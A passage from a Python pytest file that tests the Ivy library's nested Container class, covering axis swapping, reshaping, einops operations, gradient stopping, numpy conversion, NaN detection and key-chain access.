'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_swapped = container.swapaxes(0, 1)
assert np.allclose(ivy.to_numpy(container_swapped['a']), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_swapped.a), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_swapped['b']['c']), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped.b.c), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped['b']['d']), np.array([[10.], [9.], [8.], [7.]]))
assert np.allclose(ivy.to_numpy(container_swapped.b.d), np.array([[10.], [9.], [8.], [7.]]))
# with key_chains to apply
container_swapped = container.swapaxes(0, 1, ['a', 'b/c'])
assert np.allclose(ivy.to_numpy(container_swapped['a']), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_swapped.a), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_swapped['b']['c']), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped.b.c), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped['b']['d']), np.array([10., 9., 8., 7.]))
assert np.allclose(ivy.to_numpy(container_swapped.b.d), np.array([10., 9., 8., 7.]))
# with key_chains to apply pruned
container_swapped = container.swapaxes(0, 1, ['a', 'b/c'], prune_unapplied=True)
assert np.allclose(ivy.to_numpy(container_swapped['a']), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_swapped.a), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_swapped['b']['c']), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped.b.c), np.array([[5.], [10.], [15.], [20.]]))
assert 'b/d' not in container_swapped
# with key_chains to not apply
container_swapped = container.swapaxes(0, 1, Container({'a': None, 'b': {'d': None}}), to_apply=False)
assert np.allclose(ivy.to_numpy(container_swapped['a']), np.array([0., 1., 2., 3.]))
assert np.allclose(ivy.to_numpy(container_swapped.a), np.array([0., 1., 2., 3.]))
assert np.allclose(ivy.to_numpy(container_swapped['b']['c']), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped.b.c), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped['b']['d']), np.array([10., 9., 8., 7.]))
assert np.allclose(ivy.to_numpy(container_swapped.b.d), np.array([10., 9., 8., 7.]))
# with key_chains to not apply pruned
container_swapped = container.swapaxes(0, 1, Container({'a': None, 'b': {'d': None}}), to_apply=False,
prune_unapplied=True)
assert 'a' not in container_swapped
assert np.allclose(ivy.to_numpy(container_swapped['b']['c']), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped.b.c), np.array([[5.], [10.], [15.], [20.]]))
assert 'b/d' not in container_swapped
def test_container_reshape(dev, call):
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
# pre_shape only
container_reshaped = container.reshape((1, 2, 2))
assert np.allclose(ivy.to_numpy(container_reshaped['a']), np.array([[0., 1.], [2., 3.]]))
assert np.allclose(ivy.to_numpy(container_reshaped.a), np.array([[0., 1.], [2., 3.]]))
assert np.allclose(ivy.to_numpy(container_reshaped['b']['c']), np.array([[5., 10.], [15., 20.]]))
assert np.allclose(ivy.to_numpy(container_reshaped.b.c), np.array([[5., 10.], [15., 20.]]))
assert np.allclose(ivy.to_numpy(container_reshaped['b']['d']), np.array([[10., 9.], [8., 7.]]))
assert np.allclose(ivy.to_numpy(container_reshaped.b.d), np.array([[10., 9.], [8., 7.]]))
# pre_shape and slice
dict_in = {'a': ivy.array([[[0., 1., 2., 3.], [0., 1., 2., 3.]]], dev=dev),
'b': {'c': ivy.array([[[5., 10., 15.], [20., 25., 30.]]], dev=dev),
'd': ivy.array([[[10.], [9.]]], dev=dev)}}
container = Container(dict_in)
container_reshaped = container.reshape((-1,), slice(2, None))
assert np.allclose(ivy.to_numpy(container_reshaped['a']), np.array([[0., 1., 2., 3.], [0., 1., 2., 3.]]))
assert np.allclose(ivy.to_numpy(container_reshaped.a), np.array([[0., 1., 2., 3.], [0., 1., 2., 3.]]))
assert np.allclose(ivy.to_numpy(container_reshaped['b']['c']), np.array([[5., 10., 15.], [20., 25., 30.]]))
assert np.allclose(ivy.to_numpy(container_reshaped.b.c), np.array([[5., 10., 15.], [20., 25., 30.]]))
assert np.allclose(ivy.to_numpy(container_reshaped['b']['d']), np.array([[10.], [9.]]))
assert np.allclose(ivy.to_numpy(container_reshaped.b.d), np.array([[10.], [9.]]))
# pre_shape, slice and post_shape
dict_in = {'a': ivy.array([[[0., 1., 2., 3.], [0., 1., 2., 3.]]], dev=dev),
'b': {'c': ivy.array([[[5., 10., 15.], [20., 25., 30.]]], dev=dev),
'd': ivy.array([[[10.], [9.]]], dev=dev)}}
container = Container(dict_in)
container_reshaped = container.reshape((-1,), slice(2, None), (1,))
assert np.allclose(ivy.to_numpy(container_reshaped['a']), np.array([[[0.], [1.], [2.], [3.]],
[[0.], [1.], [2.], [3.]]]))
assert np.allclose(ivy.to_numpy(container_reshaped.a), np.array([[[0.], [1.], [2.], [3.]],
[[0.], [1.], [2.], [3.]]]))
assert np.allclose(ivy.to_numpy(container_reshaped['b']['c']), np.array([[[5.], [10.], [15.]],
[[20.], [25.], [30.]]]))
assert np.allclose(ivy.to_numpy(container_reshaped.b.c), np.array([[[5.], [10.], [15.]],
[[20.], [25.], [30.]]]))
assert np.allclose(ivy.to_numpy(container_reshaped['b']['d']), np.array([[[10.]], [[9.]]]))
assert np.allclose(ivy.to_numpy(container_reshaped.b.d), np.array([[[10.]], [[9.]]]))
def test_container_einops_rearrange(dev, call):
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
container_rearranged = container.einops_rearrange('b n -> n b')
assert np.allclose(ivy.to_numpy(container_rearranged['a']), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_rearranged.a), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_rearranged['b']['c']), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_rearranged.b.c), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_rearranged['b']['d']), np.array([[10.], [9.], [8.], [7.]]))
assert np.allclose(ivy.to_numpy(container_rearranged.b.d), np.array([[10.], [9.], [8.], [7.]]))
def test_container_einops_reduce(dev, call):
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
container_reduced = container.einops_reduce('b n -> b', 'mean')
assert np.allclose(ivy.to_numpy(container_reduced['a']), np.array([1.5]))
assert np.allclose(ivy.to_numpy(container_reduced.a), np.array([1.5]))
assert np.allclose(ivy.to_numpy(container_reduced['b']['c']), np.array([12.5]))
assert np.allclose(ivy.to_numpy(container_reduced.b.c), np.array([12.5]))
assert np.allclose(ivy.to_numpy(container_reduced['b']['d']), np.array([8.5]))
assert np.allclose(ivy.to_numpy(container_reduced.b.d), np.array([8.5]))
def test_container_einops_repeat(dev, call):
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
container_repeated = container.einops_repeat('b n -> b n c', c=2)
assert np.allclose(ivy.to_numpy(container_repeated['a']),
np.array([[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]]))
assert np.allclose(ivy.to_numpy(container_repeated.a),
np.array([[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['c']),
np.array([[[5., 5.], [10., 10.], [15., 15.], [20., 20.]]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.c),
np.array([[[5., 5.], [10., 10.], [15., 15.], [20., 20.]]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['d']),
np.array([[[10., 10.], [9., 9.], [8., 8.], [7., 7.]]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.d),
np.array([[[10., 10.], [9., 9.], [8., 8.], [7., 7.]]]))
# def test_container_to_dev(dev, call):
# dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
# 'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
# 'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
# container = Container(dict_in)
#
# container_to_cpu = container.to_dev(dev)
# assert ivy.dev(container_to_cpu['a'], as_str=True) == dev
# assert ivy.dev(container_to_cpu.a, as_str=True) == dev
# assert ivy.dev(container_to_cpu['b']['c'], as_str=True) == dev
# assert ivy.dev(container_to_cpu.b.c, as_str=True) == dev
# assert ivy.dev(container_to_cpu['b']['d'], as_str=True) == dev
# assert ivy.dev(container_to_cpu.b.d, as_str=True) == dev
def test_container_stop_gradients(dev, call):
dict_in = {'a': ivy.variable(ivy.array([[[1., 2.], [3., 4.]], [[5., 6.], [7., 8.]]], dev=dev)),
'b': {'c': ivy.variable(ivy.array([[[8., 7.], [6., 5.]], [[4., 3.], [2., 1.]]], dev=dev)),
'd': ivy.variable(ivy.array([[[2., 4.], [6., 8.]], [[10., 12.], [14., 16.]]], dev=dev))}}
container = Container(dict_in)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container['a'])
assert ivy.is_variable(container.a)
assert ivy.is_variable(container['b']['c'])
assert ivy.is_variable(container.b.c)
assert ivy.is_variable(container['b']['d'])
assert ivy.is_variable(container.b.d)
# without key_chains specification
container_stopped_grads = container.stop_gradients()
assert ivy.is_array(container_stopped_grads['a'])
assert ivy.is_array(container_stopped_grads.a)
assert ivy.is_array(container_stopped_grads['b']['c'])
assert ivy.is_array(container_stopped_grads.b.c)
assert ivy.is_array(container_stopped_grads['b']['d'])
assert ivy.is_array(container_stopped_grads.b.d)
# with key_chains to apply
container_stopped_grads = container.stop_gradients(key_chains=['a', 'b/c'])
assert ivy.is_array(container_stopped_grads['a'])
assert ivy.is_array(container_stopped_grads.a)
assert ivy.is_array(container_stopped_grads['b']['c'])
assert ivy.is_array(container_stopped_grads.b.c)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads['b']['d'])
assert ivy.is_variable(container_stopped_grads.b.d)
# with key_chains to apply pruned
container_stopped_grads = container.stop_gradients(key_chains=['a', 'b/c'], prune_unapplied=True)
assert ivy.is_array(container_stopped_grads['a'])
assert ivy.is_array(container_stopped_grads.a)
assert ivy.is_array(container_stopped_grads['b']['c'])
assert ivy.is_array(container_stopped_grads.b.c)
assert 'b/d' not in container_stopped_grads
# with key_chains to not apply
container_stopped_grads = container.stop_gradients(key_chains=Container({'a': None, 'b': {'d': None}}),
to_apply=False)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads['a'])
assert ivy.is_variable(container_stopped_grads.a)
assert ivy.is_array(container_stopped_grads['b']['c'])
assert ivy.is_array(container_stopped_grads.b.c)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads['b']['d'])
assert ivy.is_variable(container_stopped_grads.b.d)
# with key_chains to not apply pruned
container_stopped_grads = container.stop_gradients(key_chains=Container({'a': None, 'b': {'d': None}}),
to_apply=False, prune_unapplied=True)
assert 'a' not in container_stopped_grads
assert ivy.is_array(container_stopped_grads['b']['c'])
assert ivy.is_array(container_stopped_grads.b.c)
assert 'b/d' not in container_stopped_grads
def test_container_as_variables(dev, call):
dict_in = {'a': ivy.array([[[1., 2.], [3., 4.]], [[5., 6.], [7., 8.]]], dev=dev),
'b': {'c': ivy.array([[[8., 7.], [6., 5.]], [[4., 3.], [2., 1.]]], dev=dev),
'd': ivy.array([[[2., 4.], [6., 8.]], [[10., 12.], [14., 16.]]], dev=dev)}}
container = Container(dict_in)
assert ivy.is_array(container['a'])
assert ivy.is_array(container.a)
assert ivy.is_array(container['b']['c'])
assert ivy.is_array(container.b.c)
assert ivy.is_array(container['b']['d'])
assert ivy.is_array(container.b.d)
variable_cont = container.as_variables()
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(variable_cont['a'])
assert ivy.is_variable(variable_cont.a)
assert ivy.is_variable(variable_cont['b']['c'])
assert ivy.is_variable(variable_cont.b.c)
assert ivy.is_variable(variable_cont['b']['d'])
assert ivy.is_variable(variable_cont.b.d)
def test_container_as_arrays(dev, call):
dict_in = {'a': ivy.variable(ivy.array([[[1., 2.], [3., 4.]], [[5., 6.], [7., 8.]]], dev=dev)),
'b': {'c': ivy.variable(ivy.array([[[8., 7.], [6., 5.]], [[4., 3.], [2., 1.]]], dev=dev)),
'd': ivy.variable(ivy.array([[[2., 4.], [6., 8.]], [[10., 12.], [14., 16.]]], dev=dev))}}
container = Container(dict_in)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container['a'])
assert ivy.is_variable(container.a)
assert ivy.is_variable(container['b']['c'])
assert ivy.is_variable(container.b.c)
assert ivy.is_variable(container['b']['d'])
assert ivy.is_variable(container.b.d)
# without key_chains specification
container_as_arrays = container.as_arrays()
assert ivy.is_array(container_as_arrays['a'])
assert ivy.is_array(container_as_arrays.a)
assert ivy.is_array(container_as_arrays['b']['c'])
assert ivy.is_array(container_as_arrays.b.c)
assert ivy.is_array(container_as_arrays['b']['d'])
assert ivy.is_array(container_as_arrays.b.d)
def test_container_num_arrays(dev, call):
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
assert container.num_arrays() == 3
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.variable(ivy.array([[5., 10., 15., 20.]], dev=dev)),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
assert container.num_arrays() == 3 if call in [helpers.np_call, helpers.jnp_call] else 2
def test_container_size_ordered_arrays(dev, call):
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10.]], dev=dev),
'd': ivy.array([[10., 9., 8.]], dev=dev)}}
container = Container(dict_in)
size_ordered = container.size_ordered_arrays()
assert np.allclose(ivy.to_numpy(size_ordered.a), np.array([[0., 1., 2., 3.]]))
assert np.allclose(ivy.to_numpy(size_ordered.b__c), np.array([[5., 10.]]))
assert np.allclose(ivy.to_numpy(size_ordered.b__d), np.array([[10., 9., 8.]]))
for v, arr in zip(size_ordered.values(), [np.array([[5., 10.]]),
np.array([[10., 9., 8.]]),
np.array([[0., 1., 2., 3.]])]):
assert np.allclose(ivy.to_numpy(v), arr)
def test_container_to_numpy(dev, call):
dict_in = {'a': ivy.variable(ivy.array([[[1., 2.], [3., 4.]], [[5., 6.], [7., 8.]]], dev=dev)),
'b': {'c': ivy.variable(ivy.array([[[8., 7.], [6., 5.]], [[4., 3.], [2., 1.]]], dev=dev)),
'd': ivy.variable(ivy.array([[[2., 4.], [6., 8.]], [[10., 12.], [14., 16.]]], dev=dev))}}
container = Container(dict_in)
# before conversion
assert ivy.is_array(container['a'])
assert ivy.is_array(container.a)
assert ivy.is_array(container['b']['c'])
assert ivy.is_array(container.b.c)
assert ivy.is_array(container['b']['d'])
assert ivy.is_array(container.b.d)
# after conversion
container_to_numpy = container.to_numpy()
assert isinstance(container_to_numpy['a'], np.ndarray)
assert isinstance(container_to_numpy.a, np.ndarray)
assert isinstance(container_to_numpy['b']['c'], np.ndarray)
assert isinstance(container_to_numpy.b.c, np.ndarray)
assert isinstance(container_to_numpy['b']['d'], np.ndarray)
assert isinstance(container_to_numpy.b.d, np.ndarray)
def test_container_from_numpy(dev, call):
dict_in = {'a': np.array([[[1., 2.], [3., 4.]], [[5., 6.], [7., 8.]]]),
'b': {'c': np.array([[[8., 7.], [6., 5.]], [[4., 3.], [2., 1.]]]),
'd': np.array([[[2., 4.], [6., 8.]], [[10., 12.], [14., 16.]]])}}
# before conversion
container = Container(dict_in)
assert isinstance(container['a'], np.ndarray)
assert isinstance(container.a, np.ndarray)
assert isinstance(container['b']['c'], np.ndarray)
assert isinstance(container.b.c, np.ndarray)
assert isinstance(container['b']['d'], np.ndarray)
assert isinstance(container.b.d, np.ndarray)
# after conversion
container_from_numpy = container.from_numpy()
assert ivy.is_array(container_from_numpy['a'])
assert ivy.is_array(container_from_numpy.a)
assert ivy.is_array(container_from_numpy['b']['c'])
assert ivy.is_array(container_from_numpy.b.c)
assert ivy.is_array(container_from_numpy['b']['d'])
assert ivy.is_array(container_from_numpy.b.d)
def test_container_arrays_as_lists(dev, call):
dict_in = {'a': ivy.array([[[1., 2.], [3., 4.]], [[5., 6.], [7., 8.]]], dev=dev),
'b': {'c': ivy.array([[[8., 7.], [6., 5.]], [[4., 3.], [2., 1.]]], dev=dev),
'd': ivy.array([[[2., 4.], [6., 8.]], [[10., 12.], [14., 16.]]], dev=dev)}}
container = Container(dict_in)
assert ivy.is_array(container['a'])
assert ivy.is_array(container.a)
assert ivy.is_array(container['b']['c'])
assert ivy.is_array(container.b.c)
assert ivy.is_array(container['b']['d'])
assert ivy.is_array(container.b.d)
# without key_chains specification
container_arrays_as_lists = container.arrays_as_lists()
assert isinstance(container_arrays_as_lists['a'], list)
assert isinstance(container_arrays_as_lists.a, list)
assert isinstance(container_arrays_as_lists['b']['c'], list)
assert isinstance(container_arrays_as_lists.b.c, list)
assert isinstance(container_arrays_as_lists['b']['d'], list)
assert isinstance(container_arrays_as_lists.b.d, list)
def test_container_has_key(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
assert container.has_key('a')
assert container.has_key('b')
assert container.has_key('c')
assert container.has_key('d')
assert not container.has_key('e')
assert not container.has_key('f')
def test_container_has_key_chain(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
assert container.has_key_chain('a')
assert container.has_key_chain('b')
assert container.has_key_chain('b/c')
assert container.has_key_chain('b/d')
assert not container.has_key_chain('b/e')
assert not container.has_key_chain('c')
def test_container_has_nans(dev, call):
container = Container({'a': ivy.array([1., 2.], dev=dev),
'b': {'c': ivy.array([2., 3.], dev=dev), 'd': ivy.array([3., 4.], dev=dev)}})
container_nan = Container({'a': ivy.array([1., 2.], dev=dev),
'b': {'c': ivy.array([float('nan'), 3.], dev=dev),
'd': ivy.array([3., 4.], dev=dev)}})
container_inf = Container({'a': ivy.array([1., 2.], dev=dev),
'b': {'c': ivy.array([2., 3.], dev=dev),
'd': ivy.array([3., float('inf')], dev=dev)}})
container_nan_n_inf = Container({'a': ivy.array([1., 2.], dev=dev),
'b': {'c': ivy.array([float('nan'), 3.], dev=dev),
'd': ivy.array([3., float('inf')], dev=dev)}})
# global
# with inf check
assert not container.has_nans()
assert container_nan.has_nans()
assert container_inf.has_nans()
assert container_nan_n_inf.has_nans()
# without inf check
assert not container.has_nans(include_infs=False)
assert container_nan.has_nans(include_infs=False)
assert not container_inf.has_nans(include_infs=False)
assert container_nan_n_inf.has_nans(include_infs=False)
# leafwise
# with inf check
container_hn = container.has_nans(leafwise=True)
assert container_hn.a is False
assert container_hn.b.c is False
assert container_hn.b.d is False
container_nan_hn = container_nan.has_nans(leafwise=True)
assert container_nan_hn.a is False
assert container_nan_hn.b.c is True
assert container_nan_hn.b.d is False
container_inf_hn = container_inf.has_nans(leafwise=True)
assert container_inf_hn.a is False
assert container_inf_hn.b.c is False
assert container_inf_hn.b.d is True
container_nan_n_inf_hn = container_nan_n_inf.has_nans(leafwise=True)
assert container_nan_n_inf_hn.a is False
assert container_nan_n_inf_hn.b.c is True
assert container_nan_n_inf_hn.b.d is True
# without inf check
container_hn = container.has_nans(leafwise=True, include_infs=False)
assert container_hn.a is False
assert container_hn.b.c is False
assert container_hn.b.d is False
container_nan_hn = container_nan.has_nans(leafwise=True, include_infs=False)
assert container_nan_hn.a is False
assert container_nan_hn.b.c is True
assert container_nan_hn.b.d is False
container_inf_hn = container_inf.has_nans(leafwise=True, include_infs=False)
assert container_inf_hn.a is False
assert container_inf_hn.b.c is False
assert container_inf_hn.b.d is False
container_nan_n_inf_hn = container_nan_n_inf.has_nans(leafwise=True, include_infs=False)
assert container_nan_n_inf_hn.a is False
assert container_nan_n_inf_hn.b.c is True
assert container_nan_n_inf_hn.b.d is False
def test_container_at_keys(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
new_container = container.at_keys(['a', 'c'])
assert np.allclose(ivy.to_numpy(new_container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert 'd' not in new_container['b']
new_container = container.at_keys('c')
assert 'a' not in new_container
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert 'd' not in new_container['b']
new_container = container.at_keys(['b'])
assert 'a' not in new_container
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container['b']['d']), np.array([3]))
def test_container_at_key_chain(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
# explicit function call
sub_container = container.at_key_chain('b')
assert np.allclose(ivy.to_numpy(sub_container['c']), np.array([2]))
sub_container = container.at_key_chain('b/c')
assert np.allclose(ivy.to_numpy(sub_container), np.array([2]))
# overridden built-in function call
sub_container = container['b']
assert np.allclose(ivy.to_numpy(sub_container['c']), np.array([2]))
sub_container = container['b/c']
assert np.allclose(ivy.to_numpy(sub_container), np.array([2]))
def test_container_at_key_chains(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
target_cont = Container({'a': True, 'b': {'c': True}})
new_container = container.at_key_chains(target_cont)
assert np.allclose(ivy.to_numpy(new_container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert 'd' not in new_container['b']
new_container = container.at_key_chains(['b/c', 'b/d'])
assert 'a' not in new_container
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container['b']['d']), np.array([3]))
new_container = container.at_key_chains('b/c')
assert 'a' not in new_container
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert 'd' not in new_container['b']
@pytest.mark.parametrize(
"include_empty", [True, False])
def test_container_all_key_chains(include_empty, dev, call):
a_val = Container() if include_empty else ivy.array([1], dev=dev)
bc_val = Container() if include_empty else ivy.array([2], dev=dev)
bd_val = Container() if include_empty else ivy.array([3], dev=dev)
dict_in = {'a': a_val, 'b': {'c': bc_val, 'd': bd_val}}
container = Container(dict_in)
kcs = container.all_key_chains(include_empty)
assert kcs[0] == 'a'
assert kcs[1] == 'b/c'
assert kcs[2] == 'b/d'
@pytest.mark.parametrize(
"include_empty", [True, False])
def test_container_key_chains_containing(include_empty, dev, call):
a_val = Container() if include_empty else ivy.array([1], dev=dev)
bc_val = Container() if include_empty else ivy.array([2], dev=dev)
bd_val = Container() if include_empty else ivy.array([3], dev=dev)
dict_in = {'a_sub': a_val, 'b': {'c': bc_val, 'd_sub': bd_val}}
container = Container(dict_in)
kcs = container.key_chains_containing('sub', include_empty)
assert kcs[0] == 'a_sub'
assert kcs[1] == 'b/d_sub'
# noinspection PyUnresolvedReferences
def test_container_set_at_keys(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container_orig = Container(dict_in)
# explicit function call
orig_container = container_orig.copy()
container = orig_container.set_at_keys({'b': ivy.array([4], dev=dev)})
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']), np.array([4]))
assert not container.has_key('c')
assert not container.has_key('d')
container = orig_container.set_at_keys({'a': ivy.array([5], dev=dev), 'c': ivy.array([6], dev=dev)})
assert np.allclose(ivy.to_numpy(container['a']), np.array([5]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([6]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
# noinspection PyUnresolvedReferences
def test_container_set_at_key_chain(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container_orig = Container(dict_in)
# explicit function call
container = container_orig.copy()
container = container.set_at_key_chain('b/e', ivy.array([4], dev=dev))
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container['b']['e']), np.array([4]))
container = container.set_at_key_chain('f', ivy.array([5], dev=dev))
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container['b']['e']), np.array([4]))
assert np.allclose(ivy.to_numpy(container['f']), np.array([5]))
# overridden built-in function call
container = container_orig.copy()
assert 'b/e' not in container
container['b/e'] = ivy.array([4], dev=dev)
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container['b']['e']), np.array([4]))
assert 'f' not in container
container['f'] = ivy.array([5], dev=dev)
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container['b']['e']), np.array([4]))
assert np.allclose(ivy.to_numpy(container['f']), np.array([5]))
# noinspection PyUnresolvedReferences
def test_container_overwrite_at_key_chain(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container_orig = Container(dict_in)
# explicit function call
container = container_orig.copy()
# noinspection PyBroadException
try:
container.overwrite_at_key_chain('b/e', ivy.array([4], dev=dev))
exception_raised = False
except Exception:
exception_raised = True
assert exception_raised
container = container.overwrite_at_key_chain('b/d', ivy.array([4], dev=dev))
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([4]))
def test_container_set_at_key_chains(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
target_container = Container({'a': ivy.array([4], dev=dev),
'b': {'d': ivy.array([5], dev=dev)}})
new_container = container.set_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container['a']), np.array([4]))
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container['b']['d']), np.array([5]))
target_container = Container({'b': {'c': ivy.array([7], dev=dev)}})
new_container = container.set_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([7]))
assert np.allclose(ivy.to_numpy(new_container['b']['d']), np.array([3]))
def test_container_overwrite_at_key_chains(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
target_container = Container({'a': ivy.array([4], dev=dev),
'b': {'d': ivy.array([5], dev=dev)}})
new_container = container.overwrite_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container['a']), np.array([4]))
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container['b']['d']), np.array([5]))
target_container = Container({'b': {'c': ivy.array([7], dev=dev)}})
new_container = container.overwrite_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([7]))
assert np.allclose(ivy.to_numpy(new_container['b']['d']), np.array([3]))
# noinspection PyBroadException
try:
container.overwrite_at_key_chains(Container({'b': {'e': ivy.array([5], dev=dev)}}))
exception_raised = False
except Exception:
exception_raised = True
assert exception_raised
def test_container_prune_keys(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
